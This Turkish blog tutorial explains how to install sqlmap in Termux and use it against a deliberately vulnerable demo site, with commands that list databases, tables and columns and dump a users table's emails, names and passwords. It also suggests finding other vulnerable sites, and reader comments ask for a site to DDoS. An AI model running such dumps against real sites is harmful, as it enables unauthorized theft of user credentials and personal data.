Sqlmap Nedir ?
SQLMAP , Python dilinde yazılmış , SQL Enjeksiyon hatalarını tespit etme , Kullanma ve veritabanı sunucularını devralma işlemini otomatikleştiren açık kaynaklı bir penetrasyon test aracıdır.
Termux Sqlmap Kurulumu
Termux Sqlmap Kurulumu
Sqlmap aracını , Yalnız Termux Üzerinden değil Kali linux , Windows gibi işletim sistemlerde Ayrıca Kullanılıyor...
Sqlmap Github
Şimdi Termux'a Kurulumu Anlatalım...
Not : Android 6.0 cihaz ve üst Cihazlarda Çalışmaktadır
Sqlmap Github
Şimdi Termux'a Kurulumu Anlatalım...
Not : Android 6.0 cihaz ve üst Cihazlarda Çalışmaktadır
Termux'u Google play'den İndirin...
Termux'u Açın Sırayla Şu Kodları Yazınız ;
1- apt update // Termux'u Günceller
2- apt upgrade // Termux'u Günceller
3- pkg install git // git Paketini Yükler
4- pkg install python // Python paketini Yükler
5- pkg install python2 // Python2 paketini Yükler
6- git clone https://github.com/sqlmapproject/sqlmap.git // Programı İndiriyoruz
7- ls // dizine Geçiyoruz
8- cd sqlmap // dosyanın içine gidiyoruz
9- python2 sqlmap.py //Son olarak çalıştırıyoruz
İsminide buldu...
1- apt update // Termux'u Günceller
2- apt upgrade // Termux'u Günceller
3- pkg install git // git Paketini Yükler
4- pkg install python // Python paketini Yükler
5- pkg install python2 // Python2 paketini Yükler
6- git clone https://github.com/sqlmapproject/sqlmap.git // Programı İndiriyoruz
7- ls // dizine Geçiyoruz
8- cd sqlmap // dosyanın içine gidiyoruz
9- python2 sqlmap.py //Son olarak çalıştırıyoruz
Termux Sqlmap Kullanımı
Sqlmap Programını Başlattık. Şimdi SQL açıklı bir Web site buluyoruz. SQL açıklı Bir Web sitesini Kolay Bir araştırma Yaparak Bulunabilirsiniz...
Örnek SQL açıklı sitesinde Gösterelim...
UYARI : SQL Açıklı Web Sitesi Tamamen Deneme ve Eğitim Amaçlı Kurulmuştur...
SQL Açıklı Web sitesini, yazının Sonunda Paylaştık Deneme Olarak Kullanabilirsiniz.
Şimdi Başlayabiliriz...
Programa Hedefi Göstermek İçin python2 sqlmap.py -u [ URL ] --dbs komutu ile Database giriyoruz....
Girdik ve Karşımıza Bunlar çıktı...
Hedefi Gösteriyoruz python2 sqlmap.py [ URL ] -D acuart --tables komutu ile Tablolar Halinde Göster dedik...
Tablo içinde "users" diye seçenek var, Kullanıcı Bilgileri genelde orda Olur...
Şimdi python2 sqlmap.py [ URL ] -D acuart --columns Komutu veriyoruz
Aşağıda 3 tablo Buldu e-mail , name ,pass, phone vb.yerlerin olduğu kısım , Kullanıcı Bilgilerin olduğu Yer. 2. Tabloda Yer Almaktadır...
Şimdi Mail Adresini Öğrenelim python2 sqlmap.py [ URL ] -D acuart -T users -C email --dump Komutu ile email adresini gösterecek...
E-mail Adresini buldu...
İsmini Öğrenelim python2 sqlmap.py [ URL ] -D acuart -T users -C name --dump
İsminide buldu...
Sitenin Şifresini Öğrenelim python2 sqlmap.py [ URL ] -D acuart -T users -C pass --dump
Sitenin Şifresini'de Bulmuş Oldu...
Böylelikle Sitenin E-mail , name , Şifresi vb. şeyleri öğrendik. Böyle daha bir çok kullanıcı bilgilerini Öğrenebiliriz. MESELA "Kart" gibi bilgilerini...
SQL Açıklı Site = http://testphp.vulnweb.com/listproducts.php?cat=1
Anlaşılmayan Yerler Için Yorum Yazabilirsiniz
İyi Günler Dileriz...
5 Comments
Yorum YapSitenin açikli olub olmadığını nasil öyrənə biliriz
ReplyAdmin ddos atabileceğim bir site varmı deneme amaçlı
ReplyUstam yanlışlıkla test link diye sitenin linkini yaptım haberiniz olsun direk kapattım yanlış anlaşılma olmasın :)
Replyhocam peki bu indirdigimiz n0sqlmap verikerini nerde goruruz /nereye kaydediliyor
Replyhttps://coder.net.tr/d/37-sqlmap-nedir-sql-injection-nedir
ReplyYorumunuzu Takip etmek için 'Beni Bilgilendir Kutusunu' aktif ediniz.